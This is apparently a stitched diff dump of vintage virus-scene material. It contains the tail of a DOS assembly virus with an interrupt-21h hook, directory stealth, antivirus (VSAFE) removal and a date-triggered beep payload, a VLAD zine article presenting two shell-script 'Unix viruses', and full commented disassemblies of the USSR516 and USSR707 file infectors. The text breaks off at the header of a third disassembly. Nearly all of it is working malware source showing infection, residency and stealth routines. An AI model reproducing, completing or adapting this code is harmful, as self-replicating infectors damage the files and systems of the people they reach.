push di ; 8-( = tbav
|
||||
push bp ;
|
||||
push es ; 8-) = I'm
|
||||
push ds ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,2524H ;
|
||||
lea bx,error ;restore the
|
||||
mov ds,bx ;errors handler
|
||||
lea bx,error+2 ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;
|
||||
pop bp ;restore the
|
||||
pop di ;resgisters
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
JMP A3 ;jmp to orig. INT 21
|
||||
;
|
||||
;**********************************************************
|
||||
; SUBRUTINES AREA
|
||||
;**********************************************************
|
||||
;
|
||||
movedor: ;
|
||||
;
|
||||
xor cx,cx ;use to move file pointer
|
||||
xor dx,dx ;
|
||||
int 21h ;
|
||||
ret ;
|
||||
;----------------------------------------------------------
|
||||
all: ;
|
||||
;
|
||||
XOR AL,AL ;use to set
|
||||
iret ;error flag
|
||||
|
||||
;***********************************************************
|
||||
; DATA AREA
|
||||
;***********************************************************
|
||||
largo dw ?
|
||||
jump db 0e9h
|
||||
real db 0cdh,20h,0
|
||||
hora dw ?
|
||||
dia dw ?
|
||||
attrib dw ?
|
||||
int21 dd ?
|
||||
error dd ?
|
||||
|
||||
ÿ;---------------------------------
|
||||
action: ;
|
||||
MOV AH,2AH ;
|
||||
INT 21H ;get date
|
||||
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
|
||||
JE cont ;nop! fuck ret
|
||||
cmp byte ptr cs:[action_dia+bp],32 ;
|
||||
jne no_day ;
|
||||
cont: ;
|
||||
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
|
||||
je set ;
|
||||
cmp byte ptr cs:[action_mes+bp],13 ;
|
||||
jne NO_DAY ;nop! fuck ret
|
||||
set: ;
|
||||
mov cx,50 ;50 beep's!
|
||||
beep: ;beep label!
|
||||
mov ax,0E07h ;
|
||||
int 10h ;print beep char
|
||||
loop beep ;go!
|
||||
NO_DAY: ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
|
||||
ÿ;---------------------------------
|
||||
ANTI_V: ;
|
||||
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
|
||||
MOV DX,5945H ;
|
||||
INT 21H ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
|
||||
ÿ;*****************************************************
|
||||
dir_s:
|
||||
pushf
|
||||
push cs
|
||||
call a3 ;Get file Stats
|
||||
test al,al ;Good FCB?
|
||||
jnz no_good ;nope
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,51h ;Is this Undocmented? huh...
|
||||
int 21h
|
||||
mov es,bx
|
||||
cmp bx,es:[16h]
|
||||
jnz not_infected
|
||||
mov bx,dx
|
||||
mov al,[bx]
|
||||
push ax
|
||||
mov ah,2fh ;Get file DTA
|
||||
int 21h
|
||||
pop ax
|
||||
inc al
|
||||
jnz fcb_okay
|
||||
add bx,7h
|
||||
fcb_okay: mov ax,es:[bx+17h]
|
||||
and ax,1fh ;UnMask Seconds Field
|
||||
xor al,byte ptr cs:fechad
|
||||
jnz not_infected
|
||||
and byte ptr es:[bx+17h],0e0h
|
||||
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
|
||||
sbb es:[bx+1fh],ax
|
||||
not_infected:pop es
|
||||
pop bx
|
||||
pop ax
|
||||
no_good: iret
|
||||
;********************************************************************
|
||||
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
|
||||
;*********************************************************************
|
||||
|
||||
action_dia Db 01fH ;day for the action
|
||||
action_mes Db 0cH ;month for the action
|
||||
FECHA DW 01eH ;Secon for mark
|
||||
FECHAd Db 01eH ;Secon for mark dir st
|
||||
fin:
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,63 @@
|
|||
|
||||
Lame Unix Viruses
|
||||
+---------------+
|
||||
|
||||
Well, you might have read the title to this article and thought, well
|
||||
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
|
||||
be answered quite simply, we had one free space! :) It was a bit of
|
||||
a dilemma to begin with, we had four articles and one space. The problem
|
||||
was they were all kinda lame. So it was a lame pick of the month episode.
|
||||
|
||||
Out of the four articles this was the leastest lamest. Well actually
|
||||
I don't know about that, but anyway it was the most different one we
|
||||
had sitting there. Just to prove the title, the author of these
|
||||
masterpieces asked to remain anonymous to save his reputation.
|
||||
|
||||
These "viruses" are the equivalent of a DOS batch file infector because
|
||||
they are written in shell language. They function similarly to companion
|
||||
infectors by renaming the original file and replacing it with themselves.
|
||||
Disinfection is simple by 'mv'ing (moving) the original files back.
|
||||
|
||||
Anyway, perhaps someone is interested so here they are. There isn't
|
||||
much use for them except to annoy your friends when it messes up all
|
||||
the files in their directory.
|
||||
|
||||
+-----------------------------------+
|
||||
#!/bin/sh
|
||||
# Dumb Unix Virus
|
||||
# I dont wanna write anutha dumb unix virus qark, i wont
|
||||
# Due to excess lameness, dont distribute
|
||||
# <Author's name withheld for obvious reasons>
|
||||
for files in *
|
||||
do
|
||||
if [ -x files ]
|
||||
then
|
||||
if [ ! -d files ]
|
||||
then
|
||||
mv files files.EVILVIRUS.HELPME
|
||||
cp $0 files
|
||||
chmod +x files
|
||||
files.EVILVIRUS.HELPME
|
||||
fi
|
||||
fi
|
||||
|
||||
+-----------------------------------+
|
||||
|
||||
cat << _EOF >unix.virus
|
||||
|
||||
|
||||
#!/bin/csh
|
||||
# Dumber Unix Virus
|
||||
# by
|
||||
# SumUtherGuy
|
||||
foreach i (*)
|
||||
mv $i bak.$i
|
||||
cp $0 $i
|
||||
i >> $i
|
||||
|
||||
end
|
||||
_EOF
|
||||
|
||||
+-----------------------------------+
|
||||
|
||||
|
|
@ -0,0 +1,278 @@
|
|||
ussr516 segment byte public
|
||||
assume cs:ussr516, ds:ussr516
|
||||
org 100h
|
||||
; Disassembled by Dark Angel of PHALCON/SKISM
|
||||
; for 40Hex Number 7 Volume 2 Issue 3
|
||||
stub: db 0e9h, 0, 0
|
||||
db 0e9h, 1, 0, 0
|
||||
; This is where the virus really begins
|
||||
start:
|
||||
push ax
|
||||
call beginvir
|
||||
|
||||
orig4 db 0cdh, 20h, 0, 0
|
||||
int30store db 0, 0, 0, 0 ; Actually it's int 21h
|
||||
; entry point
|
||||
int21store db 0, 0, 0, 0
|
||||
|
||||
beginvir: pop bp ; BP -> orig4
|
||||
mov si,bp
|
||||
mov di,103h
|
||||
add di,[di-2] ; DI -> orig4
|
||||
movsw ; restore original
|
||||
movsw ; 4 bytes of program
|
||||
xor si,si
|
||||
mov ds,si
|
||||
les di,dword ptr ds:[21h*4]
|
||||
mov [bp+8],di ; int21store
|
||||
mov [bp+0Ah],es
|
||||
lds di,dword ptr ds:[30h*4+1] ; Bug????
|
||||
findmarker:
|
||||
inc di
|
||||
cmp word ptr [di-2],0E18Ah ; Find marker bytes
|
||||
jne findmarker ; to the entry point
|
||||
mov [bp+4],di ; and move to
|
||||
mov [bp+6],ds ; int30store
|
||||
mov ax,5252h ; Get list of lists
|
||||
int 21h ; and also ID check
|
||||
|
||||
add bx,12h ; Already installed?
|
||||
jz quitvir ; then exit
|
||||
push bx
|
||||
mov ah,30h ; Get DOS version
|
||||
int 21h
|
||||
|
||||
pop bx ; bx = 12, ptr to 1st
|
||||
; disk buffer
|
||||
cmp al,3
|
||||
je handlebuffer ; if DOS 3
|
||||
ja handleDBHCH ; if > DOS 3
|
||||
inc bx ; DOS 2.X, offset is 13
|
||||
handlebuffer:
|
||||
push ds
|
||||
push bx
|
||||
lds bx,dword ptr [bx] ; Get seg:off of buffer
|
||||
inc si
|
||||
pop di
|
||||
pop es ; ES:DI->seg:off buff
|
||||
mov ax,[bx] ; ptr to next buffer
|
||||
cmp ax,0FFFFh ; least recently used?
|
||||
jne handlebuffer ; if not, go find it
|
||||
cmp si,3
|
||||
jbe quitvir
|
||||
stosw
|
||||
stosw
|
||||
jmp short movetobuffer
|
||||
handleDBHCH: ; Disk Buffer Hash Chain Head array
|
||||
lds si,dword ptr [bx] ; ptr to disk buffer
|
||||
lodsw ; info
|
||||
lodsw ; seg of disk buffer
|
||||
; hash chain head array
|
||||
inc ax ; second entry
|
||||
mov ds,ax
|
||||
xor bx,bx
|
||||
mov si,bx
|
||||
lodsw ; EMS page, -1 if not
|
||||
; in EMS
|
||||
xchg ax,di ; save in di
|
||||
lodsw ; ptr to least recently
|
||||
; used buffer
|
||||
mov [di+2],ax ; change disk buffer
|
||||
; backward offset to
|
||||
; least recently used
|
||||
xchg ax,di ; restore EMS page
|
||||
mov [di],ax ; set to least recently
|
||||
movetobuffer: ; used
|
||||
mov di,bx
|
||||
push ds
|
||||
pop es ; ES:DI -> disk buffer
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,108h
|
||||
lea si,[bp-4] ; Copy from start
|
||||
rep movsw
|
||||
mov ds,cx ; DS -> interrupt table
|
||||
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
|
||||
mov word ptr ds:[4*21h+2],es ; at int21
|
||||
quitvir:
|
||||
push cs ; CS = DS = ES
|
||||
pop es
|
||||
push es
|
||||
pop ds
|
||||
pop ax
|
||||
mov bx,ax
|
||||
mov si, 100h ; set up stack for
|
||||
push si ; the return to the
|
||||
retn ; original program
|
||||
int24:
|
||||
mov al,3 ; Ignore all errors
|
||||
iret
|
||||
tickstore db 3 ; Why???
|
||||
buffer db 3, 0, 9, 0
|
||||
|
||||
int21:
|
||||
pushf
|
||||
cli ; CP/M style call entry
|
||||
call dword ptr cs:[int30store-start]
|
||||
retn ; point of int 21h
|
||||
|
||||
int21DSDX: ; For int 21h calls
|
||||
push ds ; with
|
||||
lds dx,dword ptr [bp+2] ; DS:DX -> filename
|
||||
call int21
|
||||
pop ds
|
||||
retn
|
||||
|
||||
cmp ax,4B00h ; Execute
|
||||
je Execute
|
||||
cmp ax,5252h ; ID check
|
||||
je CheckID
|
||||
cmp ah,30h ; DOS Version
|
||||
je DosVersion
|
||||
callorig21: ; Do other calls
|
||||
jmp dword ptr cs:[int21store-start]
|
||||
DosVersion: ; Why????? ; DOS Version
|
||||
dec byte ptr cs:[tickstore-start]
|
||||
jnz callorig21 ; Continue if not 0
|
||||
push es
|
||||
xor ax,ax
|
||||
push ax
|
||||
mov es,ax
|
||||
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
|
||||
; since midnight
|
||||
and al,7 ; MOD 15
|
||||
inc ax
|
||||
inc ax
|
||||
mov cs:[tickstore-start],al ; # 2-17
|
||||
pop ax
|
||||
pop es
|
||||
iret
|
||||
CheckID: ; ID Check
|
||||
mov bx,0FFEEh ; FFEEh = -12h
|
||||
iret
|
||||
Execute: ; Execute
|
||||
push ax ; Save registers
|
||||
push cx
|
||||
push es
|
||||
push bx
|
||||
push ds ; DS:DX -> filename
|
||||
push dx ; save it on stack
|
||||
push bp
|
||||
mov bp,sp ; Set up stack frame
|
||||
sub sp,0Ah ; Temporary variables
|
||||
; [bp-A] = attributes
|
||||
; [bp-8] = int 24 off
|
||||
; [bp-6] = int 24 seg
|
||||
; [bp-4] = file time
|
||||
; [bp-2] = file date
|
||||
sti
|
||||
push cs
|
||||
pop ds
|
||||
mov ax,3301h ; Turn off ^C check
|
||||
xor dl,dl ; (never turn it back
|
||||
call int21 ; on. Bug???)
|
||||
mov ax,3524h ; Get int 24h
|
||||
call int21 ; (Critical error)
|
||||
mov [bp-8],bx
|
||||
mov [bp-6],es
|
||||
mov dx,int24-start
|
||||
mov ax,2524h ; Set to new one
|
||||
call int21
|
||||
mov ax,4300h ; Get attributes
|
||||
call int21DSDX
|
||||
jnc continue
|
||||
doneinfect:
|
||||
mov ax,2524h ; Restore crit error
|
||||
lds dx,dword ptr [bp-8] ; handler
|
||||
call int21
|
||||
cli
|
||||
mov sp,bp
|
||||
pop bp
|
||||
pop dx
|
||||
pop ds
|
||||
pop bx
|
||||
pop es
|
||||
pop cx
|
||||
pop ax
|
||||
jmp short callorig21 ; Call orig handler
|
||||
continue:
|
||||
mov [bp-0Ah],cx ; Save attributes
|
||||
test cl,1 ; Check if r/o????
|
||||
jz noclearattr
|
||||
xor cx,cx
|
||||
mov ax,4301h ; Clear attributes
|
||||
call int21DSDX ; Filename in DS:DX
|
||||
jc doneinfect ; Quit on error
|
||||
noclearattr:
|
||||
mov ax,3D02h ; Open read/write
|
||||
call int21DSDX ; Filename in DS:DX
|
||||
jc doneinfect ; Exit if error
|
||||
mov bx,ax
|
||||
mov ax,5700h ; Save time/date
|
||||
call int21
|
||||
mov [bp-4],cx
|
||||
mov [bp-2],dx
|
||||
mov dx,buffer-start
|
||||
mov cx,4
|
||||
mov ah,3Fh ; Read 4 bytes to
|
||||
call int21 ; buffer
|
||||
jc quitinf
|
||||
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
|
||||
jne quitinf ; Otherwise, quit
|
||||
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
|
||||
dec dx
|
||||
xor cx,cx
|
||||
mov ax,4201h ; go there
|
||||
call int21
|
||||
mov ds:[buffer-start],ax ; new location offset
|
||||
mov dx,orig4-start
|
||||
mov cx,4
|
||||
mov ah,3Fh ; Read 4 bytes there
|
||||
call int21
|
||||
mov dx,ds:[orig4-start]
|
||||
cmp dl,0E9h ; 0E9h means we might
|
||||
jne infect ; already be there
|
||||
mov ax,ds:[orig4+2-start] ; continue checking
|
||||
add al,dh ; to see if we really
|
||||
sub al,ah ; are there.
|
||||
jz quitinf
|
||||
infect:
|
||||
xor cx,cx
|
||||
mov dx,cx
|
||||
mov ax,4202h ; Go to EOF
|
||||
call int21
|
||||
mov ds:[buffer+2-start],ax ; save filesize
|
||||
mov cx,204h
|
||||
mov ah,40h ; Write virus
|
||||
call int21
|
||||
jc quitinf ; Exit if error
|
||||
sub cx,ax
|
||||
jnz quitinf
|
||||
mov dx,ds:[buffer-start]
|
||||
mov ax,ds:[buffer+2-start]
|
||||
sub ax,dx
|
||||
sub ax,3 ; AX->jmp offset
|
||||
mov word ptr ds:[buffer+1-start],ax; Set up buffer
|
||||
mov byte ptr ds:[buffer-start],0E9h; code the jmp
|
||||
add al,ah
|
||||
mov byte ptr ds:[buffer+3-start],al
|
||||
mov ax,4200h ; Rewind to jmploc
|
||||
call int21
|
||||
mov dx, buffer-start
|
||||
mov cx,4 ; Write in the jmp
|
||||
mov ah,40h
|
||||
call int21
|
||||
quitinf:
|
||||
mov cx,[bp-4]
|
||||
mov dx,[bp-2]
|
||||
mov ax,5701h ; Restore date/time
|
||||
call int21
|
||||
mov ah,3Eh ; Close file
|
||||
call int21
|
||||
mov cx,[bp-0Ah] ; Restore attributes
|
||||
mov ax,4301h
|
||||
call int21DSDX
|
||||
jmp doneinfect ; Return
|
||||
ussr516 ends
|
||||
end stub
|
||||
|
|
@ -0,0 +1,408 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ USSR707 ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 9-Feb-92 ÛÛ
|
||||
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_1e equ 20h
|
||||
data_2e equ 22h
|
||||
data_3e equ 4Ch
|
||||
data_4e equ 4Eh
|
||||
data_5e equ 84h
|
||||
data_6e equ 86h
|
||||
data_7e equ 413h
|
||||
data_8e equ 1460h
|
||||
data_9e equ 3
|
||||
data_10e equ 2
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
ussr707 proc far
|
||||
|
||||
start:
|
||||
mov ax,offset loc_2
|
||||
push ax
|
||||
retn
|
||||
loc_2:
|
||||
jmp short loc_3
|
||||
nop
|
||||
|
||||
ussr707 endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_2 proc near
|
||||
call sub_3
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_3:
|
||||
pop di
|
||||
sub di,6
|
||||
retn
|
||||
sub_2 endp
|
||||
|
||||
db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah
|
||||
db 26h,0FFh, 0Dh, 00h,0A0h, 00h
|
||||
db 50h,0C3h, 01h, 2Eh,0A3h,0C0h
|
||||
db 00h, 9Ch, 00h, 00h, 90h, 90h
|
||||
db 90h,0CDh
|
||||
db 20h
|
||||
loc_3:
|
||||
call sub_2
|
||||
mov ah,[di+21h]
|
||||
mov byte ptr ds:[100h],ah
|
||||
mov ax,[di+22h]
|
||||
mov word ptr ds:[101h],ax
|
||||
mov ax,[di+24h]
|
||||
mov word ptr ds:[103h],ax
|
||||
mov ah,30h ; '0'
|
||||
int 21h ; DOS Services ah=function 30h
|
||||
; get DOS version number ax
|
||||
cmp ax,1E03h
|
||||
je loc_4 ; Jump if equal
|
||||
jmp loc_9
|
||||
loc_4:
|
||||
mov bl,0
|
||||
mov ax,4BFFh
|
||||
int 21h ; ??INT Non-standard interrupt
|
||||
cmp bl,0FFh
|
||||
jne loc_5 ; Jump if not equal
|
||||
jmp loc_9
|
||||
loc_5:
|
||||
mov ax,ds:data_10e
|
||||
mov [di+14h],ax
|
||||
mov bx,di
|
||||
add bx,0Fh
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
loc_6:
|
||||
xor si,si ; Zero register
|
||||
mov ax,es
|
||||
inc ax
|
||||
cmp ax,0FFFh
|
||||
jbe loc_7 ; Jump if below or =
|
||||
jmp short loc_9
|
||||
nop
|
||||
loc_7:
|
||||
mov es,ax
|
||||
loc_8:
|
||||
mov ah,es:data_8e[si]
|
||||
cmp ah,[bx+si]
|
||||
jne loc_6 ; Jump if not equal
|
||||
inc si
|
||||
cmp si,5
|
||||
jne loc_8 ; Jump if not equal
|
||||
mov [di+0Dh],es
|
||||
mov word ptr [di+1Fh],0
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov es,ax
|
||||
call sub_7
|
||||
sub si,di
|
||||
mov ax,si
|
||||
mov cl,4
|
||||
shr ax,cl ; Shift w/zeros fill
|
||||
inc ax
|
||||
sub es:data_9e,ax
|
||||
sub ds:data_10e,ax
|
||||
mov bx,[di+14h]
|
||||
sub bx,ax
|
||||
mov es,bx
|
||||
push di
|
||||
call sub_4
|
||||
xor cx,cx ; Zero register
|
||||
mov ds,cx
|
||||
mov cl,6
|
||||
shr ax,cl ; Shift w/zeros fill
|
||||
inc ax
|
||||
sub ds:data_7e,ax
|
||||
mov ax,ds:data_5e
|
||||
mov cs:[bx+0Bh],ax
|
||||
mov ax,ds:data_6e
|
||||
mov cs:[bx+0Dh],ax
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,si
|
||||
mov si,di
|
||||
xor di,di ; Zero register
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
pop di
|
||||
sub bx,di
|
||||
add bx,2
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
cli ; Disable interrupts
|
||||
mov ds:data_5e,bx
|
||||
mov ds:data_6e,es
|
||||
sti ; Enable interrupts
|
||||
loc_9:
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov ax,offset start
|
||||
push ax
|
||||
retn
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_4 proc near
|
||||
call sub_5
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_5:
|
||||
pop bx
|
||||
retn
|
||||
sub_4 endp
|
||||
|
||||
push bx
|
||||
mov bh,4Bh ; 'K'
|
||||
cmp bh,ah
|
||||
je loc_11 ; Jump if equal
|
||||
pop bx
|
||||
loc_10:
|
||||
;* jmp far ptr loc_1
|
||||
db 0EAh, 93h, 17h, 26h, 0Dh
|
||||
loc_11:
|
||||
cmp al,0FFh
|
||||
jne loc_12 ; Jump if not equal
|
||||
pop bx
|
||||
mov bl,0FFh
|
||||
iret ; Interrupt return
|
||||
pushf ; Push flags
|
||||
;* call far ptr sub_1
|
||||
db 9Ah, 00h, 00h, 00h, 00h
|
||||
push ax
|
||||
in al,61h ; port 61h, 8255 port B, read
|
||||
xor al,3
|
||||
out 61h,al ; port 61h, 8255 B - spkr, etc
|
||||
mov al,0B6h
|
||||
out 43h,al ; port 43h, 8253 wrt timr mode
|
||||
mov ax,bx
|
||||
out 42h,al ; port 42h, 8253 timer 2 spkr
|
||||
mov al,ah
|
||||
out 42h,al ; port 42h, 8253 timer 2 spkr
|
||||
pop ax
|
||||
iret ; Interrupt return
|
||||
loc_12:
|
||||
push ax
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
mov bx,dx
|
||||
xor di,di ; Zero register
|
||||
loc_13:
|
||||
inc di
|
||||
cmp byte ptr [bx+di],0
|
||||
jne loc_13 ; Jump if not equal
|
||||
cmp word ptr [bx+di-2],4D4Fh
|
||||
je loc_14 ; Jump if equal
|
||||
jmp loc_26
|
||||
loc_14:
|
||||
cmp byte ptr [bx+di-3],43h ; 'C'
|
||||
je loc_15 ; Jump if equal
|
||||
jmp loc_26
|
||||
loc_15:
|
||||
call sub_2
|
||||
mov bx,di
|
||||
add bx,1Ah
|
||||
mov ax,70h
|
||||
mov es,ax
|
||||
xor di,di ; Zero register
|
||||
loc_16:
|
||||
inc di
|
||||
cmp di,0FFFFh
|
||||
jbe loc_17 ; Jump if below or =
|
||||
jmp loc_26
|
||||
loc_17:
|
||||
xor si,si ; Zero register
|
||||
loc_18:
|
||||
mov ah,es:[di]
|
||||
cmp ah,cs:[bx+si]
|
||||
jne loc_16 ; Jump if not equal
|
||||
inc si
|
||||
inc di
|
||||
cmp si,5
|
||||
jne loc_18 ; Jump if not equal
|
||||
sub di,5
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
push word ptr es:data_3e
|
||||
push word ptr es:data_4e
|
||||
cli ; Disable interrupts
|
||||
mov es:data_3e,di
|
||||
mov word ptr es:data_4e,70h
|
||||
sti ; Enable interrupts
|
||||
call sub_2
|
||||
mov bx,dx
|
||||
xor cx,cx ; Zero register
|
||||
mov ah,4Eh ; 'N'
|
||||
call sub_6
|
||||
jnc loc_19 ; Jump if carry=0
|
||||
jmp loc_25
|
||||
loc_19:
|
||||
mov ah,2Fh ; '/'
|
||||
call sub_6
|
||||
mov ax,es:[bx+1Ah]
|
||||
cmp ax,0F000h
|
||||
jbe loc_20 ; Jump if below or =
|
||||
jmp loc_25
|
||||
loc_20:
|
||||
push ds
|
||||
push dx
|
||||
push word ptr es:[bx+15h]
|
||||
push word ptr es:[bx+16h]
|
||||
push word ptr es:[bx+18h]
|
||||
add ax,100h
|
||||
mov cs:[di+18h],ax
|
||||
mov ax,4301h
|
||||
mov cx,20h
|
||||
call sub_6
|
||||
mov ax,3D02h
|
||||
call sub_6
|
||||
jnc loc_21 ; Jump if carry=0
|
||||
jmp short loc_24
|
||||
nop
|
||||
loc_21:
|
||||
push cs
|
||||
pop ds
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
mov cx,5
|
||||
mov dx,di
|
||||
add dx,21h
|
||||
call sub_6
|
||||
mov ax,[di+18h]
|
||||
sub ax,[di+22h]
|
||||
cmp ax,2C3h
|
||||
jne loc_23 ; Jump if not equal
|
||||
cmp byte ptr [di+20h],1Eh
|
||||
jae loc_22 ; Jump if above or =
|
||||
inc byte ptr [di+20h]
|
||||
loc_22:
|
||||
jmp short loc_24
|
||||
nop
|
||||
loc_23:
|
||||
mov byte ptr [di+17h],0B8h
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
xor dx,dx ; Zero register
|
||||
call sub_6
|
||||
mov ah,40h ; '@'
|
||||
mov cx,3
|
||||
mov dx,di
|
||||
add dx,17h
|
||||
call sub_6
|
||||
mov ah,40h ; '@'
|
||||
mov cx,2
|
||||
mov word ptr [di+17h],0C350h
|
||||
call sub_6
|
||||
mov ax,4202h
|
||||
xor cx,cx ; Zero register
|
||||
xor dx,dx ; Zero register
|
||||
call sub_6
|
||||
mov ah,40h ; '@'
|
||||
call sub_7
|
||||
mov cx,si
|
||||
sub cx,di
|
||||
mov dx,di
|
||||
call sub_6
|
||||
loc_24:
|
||||
mov ax,5701h
|
||||
pop dx
|
||||
pop cx
|
||||
call sub_6
|
||||
mov ax,4301h
|
||||
pop cx
|
||||
mov ch,0
|
||||
pop dx
|
||||
pop ds
|
||||
call sub_6
|
||||
mov ah,3Eh ; '>'
|
||||
call sub_6
|
||||
loc_25:
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
cli ; Disable interrupts
|
||||
pop word ptr es:data_4e
|
||||
pop word ptr es:data_3e
|
||||
sti ; Enable interrupts
|
||||
loc_26:
|
||||
call sub_2
|
||||
cmp byte ptr cs:[di+1Fh],0
|
||||
jne loc_27 ; Jump if not equal
|
||||
cmp byte ptr cs:[di+20h],1Eh
|
||||
jb loc_27 ; Jump if below
|
||||
mov byte ptr cs:[di+1Fh],1
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
call sub_4
|
||||
add bx,17h
|
||||
mov ax,es:data_1e
|
||||
mov cx,es:data_2e
|
||||
mov cs:[bx+2],ax
|
||||
mov cs:[bx+4],cx
|
||||
cli ; Disable interrupts
|
||||
mov es:data_1e,bx
|
||||
mov es:data_2e,cs
|
||||
sti ; Enable interrupts
|
||||
loc_27:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
pop bx
|
||||
jmp loc_10
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_6 proc near
|
||||
pushf ; Push flags
|
||||
call dword ptr cs:[di+0Bh]
|
||||
retn
|
||||
sub_6 endp
|
||||
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_7 proc near
|
||||
call sub_8
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_8:
|
||||
pop si
|
||||
add si,5
|
||||
retn
|
||||
sub_7 endp
|
||||
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
|
@ -0,0 +1,384 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ USSR711 ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 9-Feb-92 ÛÛ
|
||||
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
